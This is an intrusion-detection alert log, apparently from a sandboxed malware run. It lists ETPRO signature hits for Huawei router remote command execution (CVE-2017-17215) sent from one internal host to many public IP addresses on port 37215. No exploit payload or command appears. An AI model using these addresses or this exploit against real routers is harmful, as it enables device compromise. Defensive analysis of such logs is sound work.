                                            06/14/24-10:44:04.421597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4714437215192.168.2.14156.218.202.131
                                            06/14/24-10:43:39.792724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5580037215192.168.2.14197.227.123.140
                                            06/14/24-10:44:10.543731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5094037215192.168.2.14156.160.146.155
                                            06/14/24-10:44:29.011762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3561037215192.168.2.14156.58.11.136
                                            06/14/24-10:43:39.790831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4117237215192.168.2.14156.114.209.67
                                            06/14/24-10:44:16.732139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5404637215192.168.2.1441.169.179.117
                                            06/14/24-10:44:26.980464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5463437215192.168.2.14197.222.169.123
                                            06/14/24-10:43:52.150100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4370237215192.168.2.14197.199.155.185
                                            06/14/24-10:43:50.110699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200437215192.168.2.14156.15.76.253
                                            06/14/24-10:44:31.094882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6090637215192.168.2.14156.52.76.251
                                            06/14/24-10:43:45.965814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5552237215192.168.2.1441.61.92.180
                                            06/14/24-10:44:24.914803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5180837215192.168.2.14156.210.114.76
                                            06/14/24-10:43:48.031159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5193037215192.168.2.14156.73.54.95
                                            06/14/24-10:43:43.942236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4266237215192.168.2.14197.23.118.124
                                            06/14/24-10:43:56.226367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4189637215192.168.2.14156.149.251.76
                                            06/14/24-10:44:26.977482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4501437215192.168.2.14197.138.37.185
                                            06/14/24-10:43:34.663034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4260437215192.168.2.1441.219.214.89
                                            06/14/24-10:43:34.674866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4687837215192.168.2.14197.74.88.212
                                            06/14/24-10:44:22.880038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5192437215192.168.2.14156.232.255.103
                                            06/14/24-10:43:41.850331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4768237215192.168.2.14197.55.190.177
                                            06/14/24-10:44:04.408602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5009637215192.168.2.14156.47.218.239
                                            06/14/24-10:43:41.849322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6079637215192.168.2.14197.34.129.85
                                            06/14/24-10:43:52.150806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6069037215192.168.2.1441.2.131.174
                                            06/14/24-10:44:33.150419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5957037215192.168.2.14197.111.20.21
                                            06/14/24-10:44:08.504411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5221837215192.168.2.14156.41.100.179
                                            06/14/24-10:44:24.916170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615237215192.168.2.1441.15.59.19
                                            06/14/24-10:43:48.030002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5363837215192.168.2.14156.103.180.3
                                            06/14/24-10:43:39.791556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4744837215192.168.2.1441.36.117.78
                                            06/14/24-10:44:16.735543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5331637215192.168.2.1441.87.68.2
                                            06/14/24-10:44:10.545670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4462237215192.168.2.1441.94.49.255
                                            06/14/24-10:44:35.177546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3735837215192.168.2.14197.58.217.203
                                            06/14/24-10:43:45.985251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740837215192.168.2.14197.187.47.21
                                            06/14/24-10:44:12.617438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4143637215192.168.2.14156.179.52.243
                                            06/14/24-10:44:18.762814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3616837215192.168.2.14197.9.71.186
                                            06/14/24-10:43:54.185200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4938237215192.168.2.14156.216.236.189
                                            06/14/24-10:43:54.183380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5769037215192.168.2.14156.167.10.185
                                            06/14/24-10:44:31.082447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4439837215192.168.2.14156.42.76.40
                                            06/14/24-10:43:54.201970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3843437215192.168.2.14156.70.190.19
                                            06/14/24-10:44:04.424987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5344037215192.168.2.1441.4.50.91
                                            06/14/24-10:43:34.679542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3950037215192.168.2.14197.114.97.36
                                            06/14/24-10:44:08.502710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5143437215192.168.2.14156.236.143.61
                                            06/14/24-10:44:12.614244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5605837215192.168.2.14197.33.218.255
                                            06/14/24-10:44:04.420035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4914237215192.168.2.1441.181.6.96
                                            06/14/24-10:44:27.001543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4626237215192.168.2.14156.177.168.20
                                            06/14/24-10:43:58.273644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4868637215192.168.2.14156.247.144.62
                                            06/14/24-10:43:39.791490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3315237215192.168.2.1441.232.239.102
                                            06/14/24-10:44:31.086865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4562237215192.168.2.14197.201.232.187
                                            06/14/24-10:44:06.470581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3507837215192.168.2.14197.1.126.73
                                            06/14/24-10:44:29.014321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4120037215192.168.2.1441.146.175.115
                                            06/14/24-10:44:16.718560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6085237215192.168.2.14156.212.58.87
                                            06/14/24-10:44:20.806431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5496637215192.168.2.1441.57.241.130
                                            06/14/24-10:43:58.294955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4844837215192.168.2.14156.108.102.247
                                            06/14/24-10:44:06.451483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5537037215192.168.2.14156.50.115.169
                                            06/14/24-10:44:10.545237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4914037215192.168.2.1441.132.146.201
                                            06/14/24-10:43:56.229845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4911037215192.168.2.14156.163.186.239
                                            06/14/24-10:44:14.687651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5607237215192.168.2.1441.104.68.183
                                            06/14/24-10:43:48.020470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3923637215192.168.2.14197.41.33.124
                                            06/14/24-10:43:50.068405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5764837215192.168.2.14197.189.215.128
                                            06/14/24-10:43:56.225437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3343237215192.168.2.14156.255.44.159
                                            06/14/24-10:43:45.968004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6049837215192.168.2.14197.151.213.69
                                            06/14/24-10:44:16.733071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5800837215192.168.2.14156.1.6.130
                                            06/14/24-10:44:18.763627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4732437215192.168.2.14156.63.118.179
                                            06/14/24-10:43:58.292582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4901037215192.168.2.14156.208.202.8
                                            06/14/24-10:43:50.073094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3959037215192.168.2.1441.14.62.79
                                            06/14/24-10:44:24.917555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761037215192.168.2.14156.150.175.102
                                            06/14/24-10:44:12.617413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4253637215192.168.2.14197.42.198.82
                                            06/14/24-10:43:39.812329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3531237215192.168.2.1441.63.115.65
                                            06/14/24-10:43:48.018780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513637215192.168.2.14197.86.124.213
                                            06/14/24-10:44:06.449240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5954437215192.168.2.14197.183.213.30
                                            06/14/24-10:44:12.615177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4055637215192.168.2.1441.82.92.191
                                            06/14/24-10:44:31.057594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5987237215192.168.2.14197.153.69.72
                                            06/14/24-10:43:43.944719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5538437215192.168.2.1441.183.185.219
                                            06/14/24-10:44:33.133014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5175237215192.168.2.1441.101.165.48
                                            06/14/24-10:44:12.617257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5152037215192.168.2.14156.76.234.29
                                            06/14/24-10:44:00.339262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4832037215192.168.2.14197.79.214.222
                                            06/14/24-10:44:22.877967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5103437215192.168.2.14156.117.224.169
                                            06/14/24-10:44:24.914560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3865437215192.168.2.14156.116.180.67
                                            06/14/24-10:44:29.021936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5934037215192.168.2.14156.220.153.213
                                            06/14/24-10:44:31.079107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4682837215192.168.2.14197.35.192.232
                                            06/14/24-10:44:12.615099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861237215192.168.2.1441.68.29.112
                                            06/14/24-10:43:34.663419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4761637215192.168.2.14156.99.46.18
                                            06/14/24-10:44:00.325360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5588237215192.168.2.14197.219.69.55
                                            06/14/24-10:43:36.718178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5556237215192.168.2.1441.25.184.121
                                            06/14/24-10:43:56.227420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5774237215192.168.2.14156.54.142.44
                                            06/14/24-10:44:06.452117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4729637215192.168.2.1441.105.233.32
                                            06/14/24-10:44:31.053624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4598037215192.168.2.14197.42.204.121
                                            06/14/24-10:44:06.452141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4721837215192.168.2.14156.124.130.111
                                            06/14/24-10:44:35.179901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4004637215192.168.2.14197.57.111.48
                                            06/14/24-10:44:20.829544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4572837215192.168.2.14156.170.159.36
                                            06/14/24-10:43:56.228702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4705437215192.168.2.14197.42.253.204
                                            06/14/24-10:43:39.790404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4324837215192.168.2.14156.34.85.8
                                            06/14/24-10:44:31.053503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5210837215192.168.2.14156.14.224.198
                                            06/14/24-10:43:39.812828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3593837215192.168.2.1441.129.238.136
                                            06/14/24-10:44:10.546675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4444237215192.168.2.1441.24.152.247
                                            06/14/24-10:44:06.452721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5042237215192.168.2.14156.144.169.211
                                            06/14/24-10:43:39.790611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5590637215192.168.2.14197.240.173.141
                                            06/14/24-10:44:26.976960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3985837215192.168.2.14156.208.185.233
                                            06/14/24-10:43:56.227453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5686437215192.168.2.14156.79.74.202
                                            06/14/24-10:44:00.323458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4706237215192.168.2.14197.209.160.104
                                            06/14/24-10:44:26.977861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5903437215192.168.2.14156.214.228.118
                                            06/14/24-10:43:41.896363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5918837215192.168.2.14156.218.178.89
                                            06/14/24-10:44:06.453460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4074437215192.168.2.14156.211.97.18
                                            06/14/24-10:44:20.829840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4944037215192.168.2.14156.49.6.50
                                            06/14/24-10:44:14.671313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5650837215192.168.2.14156.27.186.13
                                            06/14/24-10:44:22.858180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4203437215192.168.2.1441.87.222.206
                                            06/14/24-10:44:02.386174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4912637215192.168.2.14156.84.68.123
                                            06/14/24-10:44:02.368106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5523837215192.168.2.14156.83.234.195
                                            06/14/24-10:44:18.777458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4899837215192.168.2.14156.214.71.152
                                            06/14/24-10:44:31.090906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5566037215192.168.2.14156.34.77.151
                                            06/14/24-10:43:45.992008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4813037215192.168.2.1441.40.224.85
                                            06/14/24-10:44:08.519463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6041237215192.168.2.14156.145.190.158
                                            06/14/24-10:44:00.326535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3440237215192.168.2.1441.73.211.130
                                            06/14/24-10:44:06.453389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5330837215192.168.2.14197.245.26.198
                                            06/14/24-10:43:45.968185TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5136437215192.168.2.14156.16.131.101
                                            06/14/24-10:44:10.562973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3951037215192.168.2.14197.147.239.48
                                            06/14/24-10:44:16.718386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025237215192.168.2.1441.172.21.139
                                            06/14/24-10:44:26.977571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4288237215192.168.2.14156.247.55.156
                                            06/14/24-10:43:41.850083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3625637215192.168.2.1441.229.65.243
                                            06/14/24-10:43:34.676146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5134837215192.168.2.14156.239.255.247
                                            06/14/24-10:43:52.150662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4840437215192.168.2.14156.83.221.77
                                            06/14/24-10:44:29.011222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6040837215192.168.2.1441.186.163.178
                                            06/14/24-10:44:02.364923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3455037215192.168.2.14197.245.161.106
                                            06/14/24-10:44:10.543848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842237215192.168.2.14156.156.170.120
                                            06/14/24-10:44:00.326116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3822837215192.168.2.1441.108.153.231
                                            06/14/24-10:44:04.411968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5879437215192.168.2.14156.174.112.4
                                            06/14/24-10:44:16.737715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4774437215192.168.2.1441.143.89.41
                                            06/14/24-10:44:29.013377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5641437215192.168.2.14156.245.7.232
                                            06/14/24-10:43:39.791011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4042837215192.168.2.14156.249.174.206
                                            06/14/24-10:44:16.717143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5339837215192.168.2.1441.113.152.225
                                            06/14/24-10:43:36.717180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4557237215192.168.2.14156.33.122.105
                                            06/14/24-10:43:50.073668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216637215192.168.2.14156.162.246.59
                                            06/14/24-10:43:36.705483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4622237215192.168.2.1441.3.97.244
                                            06/14/24-10:43:56.228654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5242237215192.168.2.1441.212.76.251
                                            06/14/24-10:43:41.849376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5822837215192.168.2.1441.230.212.237
                                            06/14/24-10:44:18.762621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4161037215192.168.2.14197.115.217.224
                                            06/14/24-10:43:45.992276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4273037215192.168.2.14197.25.165.66
                                            06/14/24-10:44:24.944602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3759437215192.168.2.14197.0.156.179
                                            06/14/24-10:44:18.761229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4038237215192.168.2.1441.155.219.224
                                            06/14/24-10:44:14.687393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316837215192.168.2.14156.39.225.102
                                            06/14/24-10:44:31.092450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3510237215192.168.2.14156.79.114.184
                                            06/14/24-10:43:36.705287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5576837215192.168.2.14197.138.17.253
                                            06/14/24-10:44:16.732498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5451037215192.168.2.1441.9.23.81
                                            06/14/24-10:43:43.967219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4310237215192.168.2.14156.100.237.184
                                            06/14/24-10:44:22.861346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4235837215192.168.2.14156.241.79.74
                                            06/14/24-10:43:37.758947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5608437215192.168.2.14156.236.110.112
                                            06/14/24-10:44:04.419898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3661037215192.168.2.14156.35.47.92
                                            06/14/24-10:43:58.275695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5630037215192.168.2.1441.236.169.89
                                            06/14/24-10:44:00.337284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4186037215192.168.2.14197.68.180.17
                                            06/14/24-10:43:34.677689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5146837215192.168.2.14156.198.108.43
                                            06/14/24-10:43:39.810699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5825837215192.168.2.14197.193.48.140
                                            06/14/24-10:43:58.295500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5030237215192.168.2.14197.213.202.84
                                            06/14/24-10:43:52.150571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3439637215192.168.2.14156.137.250.238
                                            06/14/24-10:44:20.803338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886037215192.168.2.14197.226.62.130
                                            06/14/24-10:43:43.943598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5909037215192.168.2.1441.105.102.98
                                            06/14/24-10:43:50.071484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316437215192.168.2.1441.230.221.198
                                            06/14/24-10:44:04.422821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5277837215192.168.2.14156.39.12.66
                                            06/14/24-10:44:29.024652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4309637215192.168.2.1441.136.253.198
                                            06/14/24-10:43:52.147057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5394437215192.168.2.14197.36.131.217
                                            06/14/24-10:44:22.862478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3940037215192.168.2.1441.115.65.108
                                            06/14/24-10:44:20.806313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079837215192.168.2.1441.202.123.168
                                            06/14/24-10:44:33.151195TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6023237215192.168.2.14197.94.135.183
                                            06/14/24-10:43:41.902160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4560837215192.168.2.14156.218.189.164
                                            06/14/24-10:43:54.201097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3719237215192.168.2.14156.104.69.31
                                            06/14/24-10:43:56.229136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4986037215192.168.2.14197.161.142.178
                                            06/14/24-10:43:54.198587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5938837215192.168.2.14197.19.92.170
                                            06/14/24-10:43:43.941864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4549637215192.168.2.14197.13.201.37
                                            06/14/24-10:43:43.944241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5534037215192.168.2.1441.99.241.90
                                            06/14/24-10:43:54.201421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4765237215192.168.2.1441.172.20.162
                                            06/14/24-10:44:12.640498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4910437215192.168.2.1441.200.5.131
                                            06/14/24-10:43:43.944515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4786437215192.168.2.14197.200.199.220
                                            06/14/24-10:44:18.762282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5297037215192.168.2.14156.169.183.203
                                            06/14/24-10:43:56.230617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4674037215192.168.2.14156.27.83.39
                                            06/14/24-10:43:39.792631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4527637215192.168.2.14156.189.43.187
                                            06/14/24-10:44:06.452972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5734037215192.168.2.14156.164.198.139
                                            06/14/24-10:44:33.149906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4867237215192.168.2.14156.101.80.131
                                            06/14/24-10:44:16.718674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618837215192.168.2.14197.255.249.229
                                            06/14/24-10:44:18.777108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5541637215192.168.2.14197.5.232.128
                                            06/14/24-10:44:02.366442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6089437215192.168.2.14156.123.35.39
                                            06/14/24-10:43:45.984181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5932037215192.168.2.14197.134.111.118
                                            06/14/24-10:44:35.180116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5138637215192.168.2.14197.161.111.217
                                            06/14/24-10:44:14.689653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3493237215192.168.2.1441.107.54.122
                                            06/14/24-10:43:58.288962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5272637215192.168.2.14197.180.54.132
                                            06/14/24-10:44:16.718526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6004437215192.168.2.14156.28.247.181
                                            06/14/24-10:44:20.807437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922237215192.168.2.14156.168.39.131
                                            06/14/24-10:44:14.668565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3402637215192.168.2.14156.145.191.0
                                            06/14/24-10:43:56.253820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4330437215192.168.2.14197.167.97.156
                                            06/14/24-10:43:39.793058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4338637215192.168.2.14197.37.35.158
                                            06/14/24-10:43:43.943550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3422437215192.168.2.14156.138.157.207
                                            06/14/24-10:44:14.689090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3423437215192.168.2.14156.146.133.254
